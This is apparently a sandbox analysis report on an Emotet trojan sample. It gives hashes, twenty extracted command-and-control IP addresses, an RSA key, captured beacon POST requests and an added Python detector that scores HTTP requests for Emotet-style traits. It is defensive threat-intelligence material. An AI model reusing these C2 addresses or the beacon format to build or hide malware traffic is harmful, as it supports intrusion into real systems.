Analysis

  • max time kernel
    137s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    17-07-2020 22:55

General

  • Target

    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe

  • Size

    273KB

  • MD5

    06e644beed2742ff076b8dc4a3f71fd1

  • SHA1

    135d1f978d305d68169ea2d17a80e28ba0524e98

  • SHA256

    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414

  • SHA512

    4db22553db043706acfa2a364d9fb768f4d0912967c7ffbc51816ca071672adeecee84208edc51d61782bd9f02066c2eb2bc810ad5236668922064e1b54f2257

Score
10/10

Malware Config

Extracted

Family

emotet

C2

177.144.130.105:443

198.27.69.201:8080

157.7.164.178:8081

78.188.170.128:80

203.153.216.178:7080

77.74.78.80:443

178.33.167.120:8080

177.0.241.28:80

143.95.101.72:8080

51.38.201.19:7080

181.167.35.84:80

41.185.29.128:8080

192.163.221.191:8080

181.164.110.7:80

203.153.216.182:7080

80.211.32.88:8080

113.160.180.109:80

185.142.236.163:443

192.241.220.183:8080

87.106.231.60:8080

rsa_pubkey.plain

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ
cMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j
l32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB
-----END PUBLIC KEY-----

Signatures

  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Users\Admin\AppData\Local\Temp\60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    "C:\Users\Admin\AppData\Local\Temp\60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe"
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: EmotetMutantsSpam
    PID:652

Network

  • POST http://177.144.130.105:443/fRWcfj2CBG0/GX52zywQDP0skHvRf/
    (plain HTTP on TCP/443, not TLS: the sandbox captured the request headers in clear)
    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    Remote address:
    177.144.130.105:443
    Request
    POST /fRWcfj2CBG0/GX52zywQDP0skHvRf/ HTTP/1.1
    Referer: http://177.144.130.105/fRWcfj2CBG0/GX52zywQDP0skHvRf/
    Content-Type: multipart/form-data; boundary=---------------------------756975529789429
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 177.144.130.105:443
    Content-Length: 4500
    Connection: Keep-Alive
    Cache-Control: no-cache
  • POST http://198.27.69.201:8080/kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/
    60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    Remote address:
    198.27.69.201:8080
    Request
    POST /kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/ HTTP/1.1
    Referer: http://198.27.69.201/kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/
    Content-Type: multipart/form-data; boundary=---------------------------198771306462490
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 198.27.69.201:8080
    Content-Length: 4500
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 17 Jul 2020 22:56:38 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 127.0.0.1:47001
  • 177.144.130.105:443
    http://177.144.130.105:443/fRWcfj2CBG0/GX52zywQDP0skHvRf/
    Protocol: http (plaintext, despite the port)
    Process: 60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    Sent: 6.8kB (10 packets)
    Received: 432 B (9 packets)
    HTTP Request: POST http://177.144.130.105:443/fRWcfj2CBG0/GX52zywQDP0skHvRf/
    HTTP Response: none recorded
  • 198.27.69.201:8080
    http://198.27.69.201:8080/kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/
    Protocol: http
    Process: 60cbb299a714b87d10e2b6568e81e3f1f1e4787e6c8dda3aa696a7f7d33fa414.exe
    Sent: 5.7kB (16 packets)
    Received: 580 B (7 packets)
    HTTP Request: POST http://198.27.69.201:8080/kd1b/RD0y8MG/CvF2l9S/42phKkNAQ4t/HsuzPNyZ/
    HTTP Response: 200
  • 239.255.255.250:1900 (SSDP multicast)
    1.3kB, 8 packets
  • 239.255.255.250:1900
  • 10.10.0.255:137 (netbios-ns, local broadcast)
    288 B, 3 packets
  • 10.10.0.24:137 (netbios-ns)
    270 B, 3 packets

The SSDP multicast and NetBIOS name-service traffic is typical Windows background chatter inside the sandbox; treat it as noise unless other evidence ties it to the sample. The two POSTs to addresses from the extracted C2 list are the entries that matter.
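The two captured requests share the traits that make this family's beaconing easy to spot on the wire: a POST to a bare IP literal on a non-standard port (here plaintext HTTP on 443 and 8080), a multipart/form-data body to a path of random alphanumeric segments, a Referer that repeats the URL without the port, and a fixed, outdated MSIE 7.0 User-Agent. As an added example (not part of the sandbox report), the following Python scores a raw plaintext HTTP request against those traits and the C2 list extracted above; the first captured request is embedded verbatim, the benign GET is constructed for contrast, and the function names and the three-indicator threshold are this example's own choices.

```python
import re
from ipaddress import ip_address

# (ip, port) pairs from the extracted Emotet config above.
EMOTET_C2 = {
    ("177.144.130.105", 443), ("198.27.69.201", 8080), ("157.7.164.178", 8081),
    ("78.188.170.128", 80), ("203.153.216.178", 7080), ("77.74.78.80", 443),
    ("178.33.167.120", 8080), ("177.0.241.28", 80), ("143.95.101.72", 8080),
    ("51.38.201.19", 7080), ("181.167.35.84", 80), ("41.185.29.128", 8080),
    ("192.163.221.191", 8080), ("181.164.110.7", 80), ("203.153.216.182", 7080),
    ("80.211.32.88", 8080), ("113.160.180.109", 80), ("185.142.236.163", 443),
    ("192.241.220.183", 8080), ("87.106.231.60", 8080),
}

# First request captured by the sandbox (copied from the report).
CAPTURED_POST_443 = """POST /fRWcfj2CBG0/GX52zywQDP0skHvRf/ HTTP/1.1
Referer: http://177.144.130.105/fRWcfj2CBG0/GX52zywQDP0skHvRf/
Content-Type: multipart/form-data; boundary=---------------------------756975529789429
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 177.144.130.105:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache
"""

# Constructed benign request for contrast (not from the report).
BENIGN_GET = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/78.0
Connection: keep-alive
"""

# Emotet paths: a few alphanumeric segments, no file extension, trailing slash.
RANDOM_PATH = re.compile(r"^/(?:[A-Za-z0-9]+/)+$")


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, {lower-case header: value})."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def split_host(host: str):
    """'1.2.3.4:8080' -> ('1.2.3.4', 8080); no explicit port means 80 for plaintext HTTP."""
    name, _, port = host.partition(":")
    return name, int(port) if port else 80


def is_ip_literal(name: str) -> bool:
    try:
        ip_address(name)
        return True
    except ValueError:
        return False


def emotet_c2_indicators(raw: str) -> list:
    """Return the Emotet-style traits present in one plaintext HTTP request."""
    method, path, hdr = parse_request(raw)
    host, port = split_host(hdr.get("host", ""))
    hits = []
    if is_ip_literal(host):
        hits.append("host-is-bare-ip")
    if (host, port) in EMOTET_C2:
        hits.append("known-emotet-c2")
    if port == 443:
        # The headers are readable in clear, so port 443 here carries HTTP, not TLS.
        hits.append("plaintext-http-on-443")
    if (method == "POST"
            and hdr.get("content-type", "").startswith("multipart/form-data")
            and RANDOM_PATH.match(path)):
        hits.append("multipart-post-to-random-path")
    if hdr.get("referer", "") == f"http://{host}{path}":
        hits.append("referer-mirrors-request-without-port")
    if "MSIE 7.0" in hdr.get("user-agent", ""):
        hits.append("legacy-msie7-user-agent")
    return hits


def is_emotet_like(raw: str, threshold: int = 3) -> bool:
    """Verdict: three or more traits together is a strong signal even when the C2 IP is new."""
    return len(emotet_c2_indicators(raw)) >= threshold


if __name__ == "__main__":
    print(emotet_c2_indicators(CAPTURED_POST_443))
    print(emotet_c2_indicators(BENIGN_GET))
```

The exact-match on the C2 list is the brittle part: Emotet rotates its tier-1 addresses frequently, so the behavioural traits (bare-IP host, random multipart POST path, plaintext on 443, the static User-Agent) are what keep the detection useful once this particular list is stale.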


Downloads

  • memory/652-0-0x0000000000630000-0x000000000063C000-memory.dmp

    Filesize

    48KB

  • memory/652-1-0x0000000000400000-0x0000000000449000-memory.dmp

    Filesize

    292KB
